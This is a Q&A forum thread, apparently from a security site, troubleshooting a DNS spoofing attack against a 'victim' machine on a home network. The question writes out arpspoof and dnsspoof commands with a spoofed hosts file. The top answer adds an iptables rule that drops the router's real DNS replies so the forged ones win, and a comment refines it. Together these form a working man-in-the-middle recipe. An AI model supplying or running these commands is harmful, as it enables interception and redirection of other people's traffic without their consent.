# DNSspoof not working

Tags: attacks, dns, dns-spoofing

My aim is to DNSspoof.

My network is using a wireless router with the address 192.168.1.1 and primary DNS is the same as the router address.

I have enabled Kernel IP forward in Linux.

DNS host file is
spoofhosts.txt

```
173.252.74.22  google.co.in
```

My victim machine is 192.168.1.224

I have done ARPspoof using

```
#sudo arpspoof -t 192.168.1.224 192.168.1.1 -i wlan0
#sudo arpspoof -t 192.168.1.1 192.168.1.224 -i wlan0
```

and I have done DNSspoof

```
ashok@c:~$ sudo dnsspoof -f spoofhosts.txt -i wlan0 host 192.168.1.224 and udp port 53
[sudo] password for ashok: 
dnsspoof: listening on wlan0 [host 192.168.1.224 and udp port 53]
192.168.1.224.15703 > 192.168.1.1.53:  32219+ A? google.co.in
192.168.1.224.15703 > 192.168.1.1.53:  32219+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53:  3788+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53:  3788+ A? google.co.in
```

I am getting the above responses, but DNSspoofing is not working for the victim.

However, I have observed in Wireshark at the victim system. It gives me this information by that I have observed that the DNS response is coming from the router faster than me.

[image: DNS queries]

See the second line that is giving the response from directly from the router with valid Google IP.

How to solve this? Is this the problem with the DNSspoof command? What happend?

Comment: Does your router do DNS caching? try to spoof a new 'non-cached' website

Answer (score 3):

Finally, I got it!

Dnsspoof can't modify DNS packet, it can only send another prepared packet with spoofed address. But the real packet comes to victim as first and victim's computer take into consideration only it.

The solve our problem is blocking the real packet. I made this using iptables with specific address in hex:

```
# iptables --append FORWARD --match string --algo kmp --hex-string '|e1 e0 68 2d|' --jump DROP
```

You can find your website target ip in hex in Wireshark or another sniffer when you connect with server in correct way.

I know this isn't the best method but it works :)

Comment: This worked for me as well. Converting victim IP to hex by hand or with a calculator is probably a little quicker if you didn't already have Wireshark running. e.g. `192.168.1.17` -> `'|c0 a8 01 10|'`

Comment: one downside tho is this blocks all DNS responses from the gateway to the target machine so if it's not in your `dnsspoof` hosts file the victim machine won't be able to resolve it

Answer (score 1):

Try flushing DNS cache on all involved clients before attempting DNS spoofing.

On **Windows**, open a terminal an type: `ipconfig /flushdns`

On **Linux**, open a terminal and type: `sudo /etc/init.d/nscd restart`

On **Mac OS X** open a terminal and type: `sudo dscacheutil -flushcache`

Comment: I have the same problem and flushing DNS cache on clients didn't work. And I think it is not practical to expect clients's DNS cache will expired while DNS spoofing.

Answer (score -1):

Blocking the DNS reply from the intended DNS server does not work (at least for me). The browser at the victim is waiting for the original reply and it times out if it does not arrive. The browser indicated "server timed out".